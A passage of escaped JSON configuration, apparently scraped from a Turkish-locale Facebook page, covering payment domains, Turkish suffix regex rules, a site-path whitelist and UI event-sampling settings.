allowed_domains\":[\"https:\\/\\/live.adyen.com\",\"https:\\/\\/integration-facebook.payu.in\",\"https:\\/\\/facebook.payulatam.com\",\"https:\\/\\/facebook.dlocal.com\",\"https:\\/\\/altpay-pe-test.herokuapp.com\"]},4920],[\"BootloaderEndpointConfig\",[],{\"endpointURI\":\"https:\\/\\/tr-tr.facebook.com\\/ajax\\/bootloader-endpoint\\/\",\"debugNoBatching\":false},5094],[\"BigPipeExperiments\",[],{\"link_images_to_pagelets\":false,\"enable_bigpipe_plugins\":false},907],[\"AsyncRequestConfig\",[],{\"retryOnNetworkError\":\"1\",\"useFetchStreamAjaxPipeTransport\":false},328],[\"FbtQTOverrides\",[],{\"overrides\":{}},551],[\"FbtResultGK\",[],{\"shouldReturnFbtResult\":true,\"inlineMode\":\"NO_INLINE\"},876],[\"IntlPhonologicalRules\",[],{\"meta\":{\"\\/_C\\/\":\"(\\u015f|\\u00e7|b|c|d|f|g|\\u011f|h|j|k|l|m|n|p|q|r|s|t|v|w|x|y|z|B|C|D|F|G|\\u011e|H|J|K|L|M|N|P|Q|R|S|T|V|W|X|Y|Z)\",\"\\/_T\\/\":\"(\\u015f|\\u00e7|p|t|k|s)\",\"\\/_V\\/\":\"(a|e|i|o|u|A|E|I|O|U|\\u00e4|\\u00f6|y|\\u00c4|\\u00d6|Y)\",\"\\/_B\\/\":\"([.,!?\\\\s]|^)\",\"\\/_E\\/\":\"([.,!?\\\\s]|$)\"},\"patterns\":{\"\\/&#039;\\/\":\"'\",\"\\/(\\u2018|\\u2019)\\/\":\"'\",\"\\/((a|\\u0131|A|I|u|o|U|O)_C*)\\u0001 de\\\\\\/da_E\\/\":\"$1\\u0001 da$4\",\"\\/((e|i|E|\\u0130|\\u00f6|\\u00fc|\\u00d6|\\u00dc)_C*)\\u0001 de\\\\\\/da_E\\/\":\"$1\\u0001 de$4\",\"\\/((a|\\u0131|A|I|u|o|U|O)_C*_T)\\u0001'Da(ki|n|)_E\\/\":\"$1\\u0001'ta$5$6\",\"\\/((e|i|E|\\u0130|\\u00f6|\\u00fc|\\u00d6|\\u00dc)_C*_T)\\u0001'Da(ki|n|)_E\\/\":\"$1\\u0001'te$5$6\",\"\\/((a|\\u0131|A|I|u|o|U|O)_C*)\\u0001'Da(ki|n|)_E\\/\":\"$1\\u0001'da$4$5\",\"\\/((e|i|E|\\u0130|\\u00f6|\\u00fc|\\u00d6|\\u00dc)_C*)\\u0001'Da(ki|n|)_E\\/\":\"$1\\u0001'de$4$5\",\"\\/(e|i|E|\\u0130)\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'nin$2\",\"\\/(a|\\u0131|A|I)\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'n\\u0131n$2\",\"\\/(\\u00f6|\\u00fc|\\u00d6|\\u00dc)\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'n\\u00fcn$2\",\"\\/([uoUO])\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'nun$2\",\"\\/(_Cy)\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'nin$3\",\"\\/((e|i|E|\\u0130)_C+)\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'in$4\",\"\\/((a|\\u0131|A|I)_C+)\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'\\u0131n$4\",\"\\/((\\u00f6|\\u00fc|\\u00d6|\\u00dc)_C+)\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'\\u00fcn$4\",\"\\/([uoUO]_C+)\\u0001'\\\\(n\\\\)in_E\\/\":\"$1\\u0001'un$3\",\"\\/(e|i|E|\\u0130)\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'ye$2\",\"\\/(a|\\u0131|A|I)\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'ya$2\",\"\\/(\\u00f6|\\u00fc|\\u00d6|\\u00dc)\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'ye$2\",\"\\/([uoUO])\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'ya$2\",\"\\/(_Cy)\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'ye$3\",\"\\/((e|i|E|\\u0130)_C+)\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'e$4\",\"\\/((a|\\u0131|A|I)_C+)\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'a$4\",\"\\/((\\u00f6|\\u00fc|\\u00d6|\\u00dc)_C+)\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'e$4\",\"\\/([uoUO]_C+)\\u0001'\\\\(y\\\\)e_E\\/\":\"$1\\u0001'a$3\",\"\\/(e|i|E|\\u0130)\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'yi$2\",\"\\/(a|\\u0131|A|I)\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'y\\u0131$2\",\"\\/(\\u00f6|\\u00fc|\\u00d6|\\u00dc)\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'y\\u00fc$2\",\"\\/([uoUO])\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'yu$2\",\"\\/(_Cy)\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'yi$3\",\"\\/((e|i|E|\\u0130)_C+)\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'i$4\",\"\\/((a|\\u0131|A|I)_C+)\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'\\u0131$4\",\"\\/((\\u00f6|\\u00fc|\\u00d6|\\u00dc)_C+)\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'\\u00fc$4\",\"\\/([uoUO]_C+)\\u0001'\\\\(y\\\\)i_E\\/\":\"$1\\u0001'u$3\",\"\\/\\u0001'Da(ki|n|)_E\\/\":\"\\u0001'da$1$2\",\"\\/\\u0001'\\\\(n\\\\)in_E\\/\":\"\\u0001'in$1\",\"\\/\\u0001'\\\\(y\\\\)e_E\\/\":\"\\u0001'e$1\",\"\\/\\u0001'\\\\(y\\\\)i_E\\/\":\"\\u0001'i$1\",\"\\/\\u0001 de\\\\\\/da_E\\/\":\"\\u0001 de$1\",\"\\/_\\u0001([^\\u0001]*)\\u0001\\/\":\"javascript\"}},1496],[\"IntlViewerContext\",[],{\"GENDER\":3},772],[\"NumberFormatConfig\",[],{\"decimalSeparator\":\",\",\"numberDelimiter\":\".\",\"minDigitsForThousandsSeparator\":4,\"standardDecimalPatternInfo\":{\"primaryGroupSize\":3,\"secondaryGroupSize\":3},\"numberingSystemData\":null},54],[\"SessionNameConfig\",[],{\"seed\":\"1skY\"},757],[\"ZeroCategoryHeader\",[],{},1127],[\"ZeroRewriteRules\",[],{\"rewrite_rules\":{},\"whitelist\":{\"\\/hr\\/r\":1,\"\\/hr\\/p\":1,\"\\/zero\\/unsupported_browser\\/\":1,\"\\/zero\\/policy\\/optin\":1,\"\\/zero\\/optin\\/write\\/\":1,\"\\/zero\\/optin\\/legal\\/\":1,\"\\/zero\\/optin\\/free\\/\":1,\"\\/about\\/privacy\\/\":1,\"\\/about\\/privacy\\/update\\/\":1,\"\\/about\\/privacy\\/update\":1,\"\\/zero\\/toggle\\/welcome\\/\":1,\"\\/zero\\/toggle\\/nux\\/\":1,\"\\/fup\\/interstitial\\/\":1,\"\\/work\\/landing\":1,\"\\/work\\/login\\/\":1,\"\\/work\\/email\\/\":1,\"\\/ai.php\":1,\"\\/js_dialog_resources\\/dialog_descriptions_android.json\":0,\"\\/connect\\/jsdialog\\/MPlatformAppInvitesJSDialog\\/\":0,\"\\/connect\\/jsdialog\\/MPlatformOAuthShimJSDialog\\/\":0,\"\\/connect\\/jsdialog\\/MPlatformLikeJSDialog\\/\":0,\"\\/qp\\/interstitial\\/\":1,\"\\/qp\\/action\\/redirect\\/\":1,\"\\/qp\\/action\\/close\\/\":1,\"\\/zero\\/support\\/ineligible\\/\":1,\"\\/zero_balance_redirect\\/\":1,\"\\/zero_balance_redirect\":1,\"\\/zero_balance_redirect\\/l\\/\":1,\"\\/l.php\":1,\"\\/lsr.php\":1,\"\\/ajax\\/dtsg\\/\":1,\"\\/checkpoint\\/block\\/\":1,\"\\/exitdsite\":1,\"\\/zero\\/balance\\/pixel\\/\":1,\"\\/zero\\/balance\\/\":1,\"\\/zero\\/balance\\/carrier_landing\\/\":1,\"\\/zero\\/flex\\/logging\\/\":1,\"\\/tr\":1,\"\\/tr\\/\":1,\"\\/sem_campaigns\\/sem_pixel_test\\/\":1,\"\\/bookmarks\\/flyout\\/body\\/\":1,\"\\/zero\\/subno\\/\":1,\"\\/confirmemail.php\":1,\"\\/policies\\/\":1,\"\\/mobile\\/internetdotorg\\/classifier\\/\":1,\"\\/zero\\/dogfooding\":1,\"\\/xti.php\":1,\"\\/zero\\/fblite\\/config\\/\":1,\"\\/hr\\/zsh\\/wc\\/\":1,\"\\/ajax\\/bootloader-endpoint\\/\":1,\"\\/4oh4.php\":1,\"\\/autologin.php\":1,\"\\/birthday_help.php\":1,\"\\/checkpoint\\/\":1,\"\\/contact-importer\\/\":1,\"\\/cr.php\":1,\"\\/legal\\/terms\\/\":1,\"\\/login.php\":1,\"\\/login\\/\":1,\"\\/mobile\\/account\\/\":1,\"\\/n\\/\":1,\"\\/remote_test_device\\/\":1,\"\\/upsell\\/buy\\/\":1,\"\\/upsell\\/buyconfirm\\/\":1,\"\\/upsell\\/buyresult\\/\":1,\"\\/upsell\\/promos\\/\":1,\"\\/upsell\\/continue\\/\":1,\"\\/upsell\\/h\\/promos\\/\":1,\"\\/upsell\\/loan\\/learnmore\\/\":1,\"\\/upsell\\/purchase\\/\":1,\"\\/upsell\\/promos\\/upgrade\\/\":1,\"\\/upsell\\/buy_redirect\\/\":1,\"\\/upsell\\/loan\\/buyconfirm\\/\":1,\"\\/upsell\\/loan\\/buy\\/\":1,\"\\/upsell\\/sms\\/\":1,\"\\/wap\\/a\\/channel\\/reconnect.php\":1,\"\\/wap\\/a\\/nux\\/wizard\\/nav.php\":1,\"\\/wap\\/appreg.php\":1,\"\\/wap\\/birthday_help.php\":1,\"\\/wap\\/c.php\":1,\"\\/wap\\/confirmemail.php\":1,\"\\/wap\\/cr.php\":1,\"\\/wap\\/login.php\":1,\"\\/wap\\/r.php\":1,\"\\/zero\\/datapolicy\":1,\"\\/a\\/timezone.php\":1,\"\\/a\\/bz\":1,\"\\/bz\\/reliability\":1,\"\\/r.php\":1,\"\\/mr\\/\":1,\"\\/reg\\/\":1,\"\\/registration\\/log\\/\":1,\"\\/terms\\/\":1,\"\\/f123\\/\":1,\"\\/expert\\/\":1,\"\\/experts\\/\":1,\"\\/terms\\/index.php\":1,\"\\/terms.php\":1,\"\\/srr\\/\":1,\"\\/msite\\/redirect\\/\":1,\"\\/fbs\\/pixel\\/\":1,\"\\/contactpoint\\/preconfirmation\\/\":1,\"\\/contactpoint\\/cliff\\/\":1,\"\\/contactpoint\\/confirm\\/submit\\/\":1,\"\\/contactpoint\\/confirmed\\/\":1,\"\\/contactpoint\\/login\\/\":1,\"\\/preconfirmation\\/contactpoint_change\\/\":1,\"\\/help\\/contact\\/\":1,\"\\/survey\\/\":1,\"\\/upsell\\/loyaltytopup\\/accept\\/\":1,\"\\/settings\\/\":1,\"\\/lite\\/\":1,\"\\/zero_status_update\\/\":1}},1478],[\"IntlHoldoutGK\",[],{\"inIntlHoldout\":false},2827],[\"IntlNumberTypeConfig\",[],{\"impl\":\"if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }\"},3405],[\"cr:696703\",[],{\"__rc\":[null,\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:708886\",[\"EventProfilerImpl\"],{\"__rc\":[\"EventProfilerImpl\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:717822\",[\"TimeSliceImpl\"],{\"__rc\":[\"TimeSliceImpl\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:806696\",[\"clearTimeoutBlue\"],{\"__rc\":[\"clearTimeoutBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:807042\",[\"setTimeoutBlue\"],{\"__rc\":[\"setTimeoutBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:896462\",[\"setIntervalAcrossTransitionsBlue\"],{\"__rc\":[\"setIntervalAcrossTransitionsBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:986633\",[\"setTimeoutAcrossTransitionsBlue\"],{\"__rc\":[\"setTimeoutAcrossTransitionsBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:1003267\",[\"clearIntervalBlue\"],{\"__rc\":[\"clearIntervalBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:1100101\",[\"requestAnimationFrameAcrossTransitionsSimple\"],{\"__rc\":[\"requestAnimationFrameAcrossTransitionsSimple\",\"Aa2Mkb7hFg70YsmjuKtY6cPEft-lVkFIxb-2ZHDEObmM5h9zqRMccf6f6ir8zXBw7ujVeEo\"]},-1],[\"cr:896461\",[\"setIntervalBlue\"],{\"__rc\":[\"setIntervalBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:1183579\",[\"InlineFbtResultImpl\"],{\"__rc\":[\"InlineFbtResultImpl\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:1268308\",[\"BanzaiNew\"],{\"__rc\":[\"BanzaiNew\",\"Aa1Fh0kRXdmVxjU3UyUI0pwdsx6eTp4xtJZgdkvHfx8l1ReYUpr2m8rRyyefCd8Ss_zig5thSVtOFIzDPpivPyfehmOsFbqX\"]},-1],[\"cr:729414\",[],{\"__rc\":[null,\"Aa0ChIWuOXKLUnLlVzJ5SB9YtWSLWcosbn29tyy61fwJSnmsyrhOOAglfNw4CG4KjjGUj55ZPcc0aY_Grmoh\"]},-1],[\"cr:1094907\",[],{\"__rc\":[null,\"Aa1hdRFkB3gINWa1h1rgOYxATi0fUmiujNFzEQgTNlnTTfJ3AYLxJcskGOKmbqMFy5O9dhb0ie95KFfYnBg\"]},-1],[\"EventConfig\",[],{\"sampling\":{\"bandwidth\":0,\"play\":0,\"playing\":0,\"progress\":0,\"pause\":0,\"ended\":0,\"seeked\":0,\"seeking\":0,\"waiting\":0,\"loadedmetadata\":0,\"canplay\":0,\"selectionchange\":0,\"change\":0,\"timeupdate\":2000000,\"adaptation\":0,\"focus\":0,\"blur\":0,\"load\":0,\"error\":0,\"message\":0,\"abort\":0,\"storage\":0,\"scroll\":200000,\"mousemove\":20000,\"mouseover\":10000,\"mouseout\":10000,\"mousewheel\":1,\"MSPointerMove\":10000,\"keydown\":0.1,\"click\":0.02,\"mouseup\":0.02,\"__100ms\":0.001,\"__default\":5000,\"__min\":100,\"__interactionDefault\":200,\"__eventDefault\":100000},\"page_sampling_boost\":1,\"interaction_regexes\":{\"BlueBarAccountChevronMenu\":\" _5lxs(?: .*)?$\",\"BlueBarHomeButton\":\" _bluebarLinkHome__interaction-root(?: .*)?$\",\"BlueBarProfileLink\":\" _1k67(?: .*)?$\",\"ReactComposerSproutMedia\":\" _1pnt(?: .*)?$\",\"ReactComposerSproutAlbum\":\" _1pnu(?: .*)?$\",\"ReactComposerSproutNote\":\" _3-9x(?: .*)?$\",\"ReactComposerSproutLocation\":\" _1pnv(?: .*)?$\",\"ReactComposerSproutActivity\":\" _1pnz(?: .*)?$\",\"ReactComposerSproutPeople\":\" _1pn-(?: .*)?$\",\"ReactComposerSproutLiveVideo\":\" _5tv7(?: .*)?$\",\"ReactComposerSproutMarkdown\":\" _311p(?: .*)?$\",\"ReactComposerSproutFormattedText\":\" _mwg(?: .*)?$\",\"ReactComposerSproutSticker\":\" _2vri(?: .*)?$\",\"ReactComposerSproutSponsor\":\" _5t5q(?: .*)?$\",\"ReactComposerSproutEllipsis\":\" _1gr3(?: .*)?$\",\"ReactComposerSproutContactYourRepresentative\":\" _3cnv(?: .*)?$\",\"ReactComposerSproutFunFact\":\" _2_xs(?: .*)?$\",\"TextExposeSeeMoreLink\":\" see_more_link(?: .*)?$\",\"SnowliftBigCloseButton\":\"(?: _xlt(?: .*)? _418x(?: .*)?$| _418x(?: .*)? _xlt(?: .*)?$)\",\"SnowliftPrevPager\":\"(?: snowliftPager(?: .*)? prev(?: .*)?$| prev(?: .*)? snowliftPager(?: .*)?$)\",\"SnowliftNextPager\":\"(?: snowliftPager(?: .*)? next(?: .*)?$| next(?: .*)? snowliftPager(?: .*)?$)\",\"SnowliftFullScreenButton\":\"#fbPhotoSnowliftFullScreenSwitch( .+)*\",\"PrivacySelectorMenu\":\"(?: _57di(?: .*)? _2wli(?: .*)?$| _2wli(?: .*)? _57di(?: .*)?$)\",\"ReactComposerFeedXSprouts\":\" _nh6(?: .*)?$\",\"SproutsComposerStatusTab\":\" _sg1(?: .*)?$\",\"SproutsComposerLiveVideoTab\":\" _sg1(?: .*)?$\",\"SproutsComposerAlbumTab\":\" _sg1(?: .*)?$\",\"composerAudienceSelector\":\" _ej0(?: .*)?$\",\"FeedHScrollAttachmentsPrevPager\":\" _1qqy(?: .*)?$\",\"FeedHScrollAttachmentsNextPager\":\" _1qqz(?: .*)?$\",\"DockChatTabFlyout\":\" fbDockChatTabFlyout(?: .*)?$\",\"PrivacyLiteJewel\":\" _59fc(?: .*)?$\",\"ActorSelector\":\" _6vh(?: .*)?$\",\"LegacyMentionsInput\":\"(?: ReactLegacyMentionsInput(?: .*)? uiMentionsInput(?: .*)? _2xwx(?: .*)?$| uiMentionsInput(?: .*)? ReactLegacyMentionsInput(?: .*)? _2xwx(?: .*)?$| _2xwx(?: .*)? ReactLegacyMentionsInput(?: .*)? uiMentionsInput(?: .*)?$| ReactLegacyMentionsInput(?: .*)? _2xwx(?: .*)? uiMentionsInput(?: .*)?$| uiMentionsInput(?: .*)? _2xwx(?: .*)? ReactLegacyMentionsInput(?: .*)?$| _2xwx(?: .*)? uiMentionsInput(?: .*)? ReactLegacyMentionsInput(?: .*)?$)\",\"UFIActionLinksEmbedLink\":\" _2g1w(?: .*)?$\",\"UFIPhotoAttachLink\":\" UFIPhotoAttachLinkWrapper(?: .*)?$\",\"UFIMentionsInputProxy\":\" _1osa(?: .*)?$\",\"UFIMentionsInputDummy\":\" _1osc(?: .*)?$\",\"UFIOrderingModeSelector\":\" _3scp(?: .*)?$\",\"UFIPager\":\"(?: UFIPagerRow(?: .*)? UFIRow(?: .*)?$| UFIRow(?: .*)? UFIPagerRow(?: .*)?$)\",\"UFIReplyRow\":\"(?: UFIReplyRow(?: .*)? UFICommentReply(?: .*)?$| UFICommentReply(?: .*)? UFIReplyRow(?: .*)?$)\",\"UFIReplySocialSentence\":\" UFIReplySocialSentenceRow(?: .*)?$\",\"UFIShareLink\":\" _5f9b(?: .*)?$\",\"UFIStickerButton\":\" UFICommentStickerButton(?: .*)?$\",\"MentionsInput\":\" _5yk1(?: .*)?$\",\"FantaChatTabRoot\":\" _3_9e(?: .*)?$\",\"SnowliftViewableRoot\":\" _2-sx(?: .*)?$\",\"ReactBlueBarJewelButton\":\" _5fwr(?: .*)?$\",\"UFIReactionsDialogLayerImpl\":\" _1oxk(?: .*)?$\",\"UFIReactionsLikeLinkImpl\":\" _4x9_(?: .*)?$\",\"UFIReactionsLinkImplRoot\":\" _khz(?: .*)?$\",\"Reaction\":\" _iuw(?: .*)?$\",\"UFIReactionsMenuImpl\":\" _iu-(?: .*)?$\",\"UFIReactionsSpatialReactionIconContainer\":\" _1fq9(?: .*)?$\",\"VideoComponentPlayButton\":\" _bsl(?: .*)?$\",\"FeedOptionsPopover\":\" _b1e(?: .*)?$\",\"UFICommentLikeCount\":\" UFICommentLikeButton(?: .*)?$\",\"UFICommentLink\":\" _5yxe(?: .*)?$\",\"ChatTabComposerInputContainer\":\" _552h(?: .*)?$\",\"ChatTabHeader\":\" _15p4(?: .*)?$\",\"DraftEditor\":\" _5rp7(?: .*)?$\",\"ChatSideBarDropDown\":\" _5vm9(?: .*)?$\",\"SearchBox\":\" _539-(?: .*)?$\",\"ChatSideBarLink\":\" _55ln(?: .*)?$\",\"MessengerSearchTypeahead\":\" _3rh8(?: .*)?$\",\"NotificationListItem\":\" _33c(?: .*)?$\",\"MessageJewelListItem\":\" messagesContent(?: .*)?$\",\"Messages_Jewel_Button\":\" _3eo8(?: .*)?$\",\"Notifications_Jewel_Button\":\" _3eo9(?: .*)?$\",\"snowliftopen\":\" _342u(?: .*)?$\",\"NoteTextSeeMoreLink\":\" _3qd_(?: .*)?$\",\"fbFeedOptionsPopover\":\" _1he6(?: .*)?$\",\"Requests_Jewel_Button\":\" _3eoa(?: .*)?$\",\"UFICommentActionLinkAjaxify\":\" _15-3(?: .*)?$\",\"UFICommentActionLinkRedirect\":\" _15-6(?: .*)?$\",\"UFICommentActionLinkDispatched\":\" _15-7(?: .*)?$\",\"UFICommentCloseButton\":\" _36rj(?: .*)?$\",\"UFICommentActionsRemovePreview\":\" _460h(?: .*)?$\",\"UFICommentActionsReply\":\" _460i(?: .*)?$\",\"UFICommentActionsSaleItemMessage\":\" _460j(?: .*)?$\",\"UFICommentActionsAcceptAnswer\":\" _460k(?: .*)?$\",\"UFICommentActionsUnacceptAnswer\":\" _460l(?: .*)?$\",\"UFICommentReactionsLikeLink\":\" _3-me(?: .*)?$\",\"UFICommentMenu\":\" _1-be(?: .*)?$\",\"UFIMentionsInputFallback\":\" _289b(?: .*)?$\",\"UFIMentionsInputComponent\":\" _289c(?: .*)?$\",\"UFIMentionsInputProxyInput\":\" _432z(?: .*)?$\",\"UFIMentionsInputProxyDummy\":\" _432-(?: .*)?$\",\"UFIPrivateReplyLinkMessage\":\" _14hj(?: .*)?$\",\"UFIPrivateReplyLinkSeeReply\":\" _14hk(?: .*)?$\",\"ChatCloseButton\":\" _4vu4(?: .*)?$\",\"ChatTabComposerPhotoUploader\":\" _13f-(?: .*)?$\",\"ChatTabComposerGroupPollingButton\":\" _13f_(?: .*)?$\",\"ChatTabComposerGames\":\" _13ga(?: .*)?$\",\"ChatTabComposerPlan\":\" _13gb(?: .*)?$\",\"ChatTabComposerFileUploader\":\" _13gd(?: .*)?$\",\"ChatTabStickersButton\":\" _13ge(?: .*)?$\",\"ChatTabComposerGifButton\":\" _13gf(?: .*)?$\",\"ChatTabComposerEmojiPicker\":\" _13gg(?: .*)?$\",\"ChatTabComposerLikeButton\":\" _13gi(?: .*)?$\",\"ChatTabComposerP2PButton\":\" _13gj(?: .*)?$\",\"ChatTabComposerQuickCam\":\" _13gk(?: .*)?$\",\"ChatTabHeaderAudioRTCButton\":\" _461a(?: .*)?$\",\"ChatTabHeaderVideoRTCButton\":\" _461b(?: .*)?$\",\"ChatTabHeaderOptionsButton\":\" _461_(?: .*)?$\",\"ChatTabHeaderAddToThreadButton\":\" _4620(?: .*)?$\",\"ReactComposerMediaSprout\":\" _fk5(?: .*)?$\",\"UFIReactionsBlingSocialSentenceComments\":\" _-56(?: .*)?$\",\"UFIReactionsBlingSocialSentenceSeens\":\" _2x0l(?: .*)?$\",\"UFIReactionsBlingSocialSentenceShares\":\" _2x0m(?: .*)?$\",\"UFIReactionsBlingSocialSentenceViews\":\" _-5c(?: .*)?$\",\"UFIReactionsBlingSocialSentence\":\" _-5d(?: .*)?$\",\"UFIReactionsSocialSentence\":\" _1vaq(?: .*)?$\",\"VideoFullscreenButton\":\" _39ip(?: .*)?$\",\"Tahoe\":\" _400z(?: .*)?$\",\"TahoeFromVideoPlayer\":\" _1vek(?: .*)?$\",\"TahoeFromVideoLink\":\" _2-40(?: .*)?$\",\"TahoeFromPhoto\":\" _2ju5(?: .*)?$\",\"FBStoryTrayItem\":\" _1fvw(?: .*)?$\",\"Mobile_Feed_Jewel_Button\":\"#feed_jewel( .+)*\",\"Mobile_Requests_Jewel_Button\":\"#requests_jewel( .+)*\",\"Mobile_Messages_Jewel_Button\":\"#messages_jewel( .+)*\",\"Mobile_Notifications_Jewel_Button\":\"#notifications_jewel( .+)*\",\"Mobile_Search_Jewel_Button\":\"#search_jewel( .+)*\",\"Mobile_Bookmarks_Jewel_Button\":\"#bookmarks_jewel( .+)*\",\"Mobile_Feed_UFI_Comment_Button_Permalink\":\" _l-a(?: .*)?$\",\"Mobile_Feed_UFI_Comment_Button_Flyout\":\" _4qeq(?: .*)?$\",\"Mobile_Feed_UFI_Token_Bar_Flyout\":\" _4qer(?: .*)?$\",\"Mobile_Feed_UFI_Token_Bar_Permalink\":\" _4-09(?: .*)?$\",\"Mobile_UFI_Share_Button\":\" _15kr(?: .*)?$\",\"Mobile_Feed_Photo_Permalink\":\" _1mh-(?: .*)?$\",\"Mobile_Feed_Video_Permalink\":\" _65g_(?: .*)?$\",\"Mobile_Feed_Profile_Permalink\":\" _4kk6(?: .*)?$\",\"Mobile_Feed_Story_Permalink\":\" _26yo(?: .*)?$\",\"Mobile_Feed_Page_Permalink\":\" _4e81(?: .*)?$\",\"Mobile_Feed_Group_Permalink\":\" _20u1(?: .*)?$\",\"Mobile_Feed_Event_Permalink\":\" _20u0(?: .*)?$\",\"ProfileIntroCardAddFeaturedMedia\":\" _30qr(?: .*)?$\",\"ProfileSectionAbout\":\" _84wb(?: .*)?$\",\"ProfileSectionAllRelationships\":\" _84wc(?: .*)?$\",\"ProfileSectionAtWork\":\" _2fnv(?: .*)?$\",\"ProfileSectionContactBasic\":\" _84vf(?: .*)?$\",\"ProfileSectionEducation\":\" _84vh(?: .*)?$\",\"ProfileSectionOverview\":\" _84vj(?: .*)?$\",\"ProfileSectionPlaces\":\" _84vg(?: .*)?$\",\"ProfileSectionYearOverviews\":\" _84vi(?: .*)?$\",\"IntlPolyglotHomepage\":\" _Interaction__IntlPolyglotVoteActivityCardButton(?: .*)?$\",\"ProtonElementSelection\":\" _67ft(?: .*)?$\"},\"interaction_boost\":{\"SnowliftPrevPager\":0.2,\"SnowliftNextPager\":0.2,\"ChatSideBarLink\":2,\"MessengerSearchTypeahead\":2,\"Messages_Jewel_Button\":2.5,\"Notifications_Jewel_Button\":1.5,\"Tahoe\":30,\"ProtonElementSelection\":4},\"event_types\":{\"BlueBarAccountChevronMenu\":[\"click\"],\"BlueBarHomeButton\":[\"click\"],\"BlueBarProfileLink\":[\"click\"],\"ReactComposerSproutMedia\":[\"click\"],\"ReactComposerSproutAlbum\":[\"click\"],\"ReactComposerSproutNote\":[\"click\"],\"ReactComposerSproutLocation\":[\"click\"],\"ReactComposerSproutActivity\":[\"click\"],\"ReactComposerSproutPeople\":[\"click\"],\"ReactComposerSproutLiveVideo\":[\"click\"],\"ReactComposerSproutMarkdown\":[\"click\"],\"ReactComposerSproutFormattedText\":[\"click\"],\"ReactComposerSproutSticker\":[\"click\"],\"ReactComposerSproutSponsor\":[\"click\"],\"ReactComposerSproutEllipsis\":[\"click\"],\"ReactComposerSproutContactYourRepresentative\":[\"click\"],\"ReactComposerSproutFunFact\":[\"click\"],\"TextExposeSeeMoreLink\":[\"click\"],\"SnowliftBigCloseButton\":[\"click\"],\"SnowliftPrevPager\":[\"click\"],\"SnowliftNextPager\":[\"click\"],\"SnowliftFullScreenButton\":[\"click\"],\"PrivacySelectorMenu\":[\"click\"],\"ReactComposerFeedXSprouts\":[\"click\"],\"SproutsComposerStatusTab\":[\"click\"],\"SproutsComposerLiveVideoTab\":[\"click\"],\"SproutsComposerAlbumTab\":[\"click\"],\"composerAudienceSelector\":[\"click\"],\"FeedHScrollAttachmentsPrevPager\":[\"click\"],\"FeedHScrollAttachmentsNextPager\":[\"click\"],\"DockChatTabFlyout\":[\"click\"],\"PrivacyLiteJewel\":[\"click\"],\"ActorSelector\":[\"click\"],\"LegacyMentionsInput\":[\"click\"],\"UFIActionLinksEmbedLink\":[\"click\"],\"UFIPhotoAttachLink\":[\"click\"],\"UFIMentionsInputProxy\":[\"click\"],\"UFIMentionsInputDummy\":[\"click\"],\"UFIOrderingModeSelector\":[\"click\"],\"UFIPager\":[\"click\"],\"UFIReplyRow\":[\"click\"],\"UFIReplySocialSentence\":[\"click\"],\"UFIShareLink\":[\"click\"],\"UFIStickerButton\":[\"click\"],\"MentionsInput\":[\"click\"],\"FantaChatTabRoot\":[\"click\"],\"SnowliftViewableRoot\":[\"click\"],\"ReactBlueBarJewelButton\":[\"click\"],\"UFIReactionsDialogLayerImpl\"